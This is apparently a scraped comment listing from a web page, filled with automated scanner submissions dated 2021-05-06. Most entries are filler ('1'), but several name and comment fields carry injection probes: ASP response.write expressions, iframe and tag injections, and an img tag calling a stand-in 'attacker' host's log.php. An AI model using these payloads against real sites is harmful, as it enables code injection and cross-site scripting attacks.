 • pHqghUme

  2021-05-06 09:22:27


  1


 • pHqghUme

  2021-05-06 09:22:27


  1


 • pHqghUme

  2021-05-06 09:22:27


  1


 • pHqghUme

  2021-05-06 09:22:26


  "+response.write(9368568*9892015)+"


 • pHqghUme

  2021-05-06 09:22:26


  1


 • pHqghUme

  2021-05-06 09:22:25


  1


 • pHqghUme

  2021-05-06 09:22:25


  '+response.write(9368568*9892015)+'


 • pHqghUme

  2021-05-06 09:22:25


  1


 • pHqghUme

  2021-05-06 09:22:25


  1


 • pHqghUme

  2021-05-06 09:22:23


  jp8cD4uo


 • pHqghUme

  2021-05-06 09:22:23


  response.write(9368568*9892015)


 • B52LiZ1j

  2021-05-06 09:22:22


  1


 • "+response.write(9967238*9557863)+"

  2021-05-06 09:22:22


  1


 • '+response.write(9967238*9557863)+'

  2021-05-06 09:22:20


  1


 • pHqghUme

  2021-05-06 09:22:20


  1


 • pHqghUme

  2021-05-06 09:22:19


  1


 • response.write(9967238*9557863)

  2021-05-06 09:22:18


  1


 • pHqghUme

  2021-05-06 09:22:17


  1


 • pHqghUme

  2021-05-06 09:22:17


  1


 • pHqghUme

  2021-05-06 09:22:16


  1


 • pHqghUme

  2021-05-06 09:22:15


  1


 • pHqghUme

  2021-05-06 09:22:13


  1


 • pHqghUme

  2021-05-06 09:22:13


  1


 • pHqghUme

  2021-05-06 09:22:11


  1


 • pHqghUme

  2021-05-06 09:20:39


  1


 • pHqghUme

  2021-05-06 09:20:22


  1


 • pHqghUme

  2021-05-06 09:20:07


  1DtBiDzngAO


 • 1Ch8gtzXbeO

  2021-05-06 09:20:05


  1


 • pHqghUme

  2021-05-06 09:20:03


  1


 • pHqghUme

  2021-05-06 09:20:02


  1


 • pHqghUme

  2021-05-06 09:06:27


  1


 • pHqghUme

  2021-05-06 05:57:38


  1<vT5hCd<


 • pHqghUme<anSwuW<

  2021-05-06 05:57:33


  1


 • pHqghUme

  2021-05-06 05:57:32


  1<img sRc='http://attacker-9366/log.php?


 • pHqghUme<img sRc='http://attacker-9341/log.php?

  2021-05-06 05:57:29


  1


 • pHqghUme

  2021-05-06 05:57:27


  1<cfOrxr x=9823>


 • pHqghUme<NmKo4h x=9750>

  2021-05-06 05:57:23


  1


 • pHqghUme

  2021-05-06 05:57:22


  1<ifRAme sRc=9914.com></IfRamE>


 • pHqghUme<ifRAme sRc=9871.com></IfRamE>

  2021-05-06 05:57:18


  1


 • pHqghUme

  2021-05-06 05:57:17


  1<WE88SB>BOFJB[!+!]</WE88SB>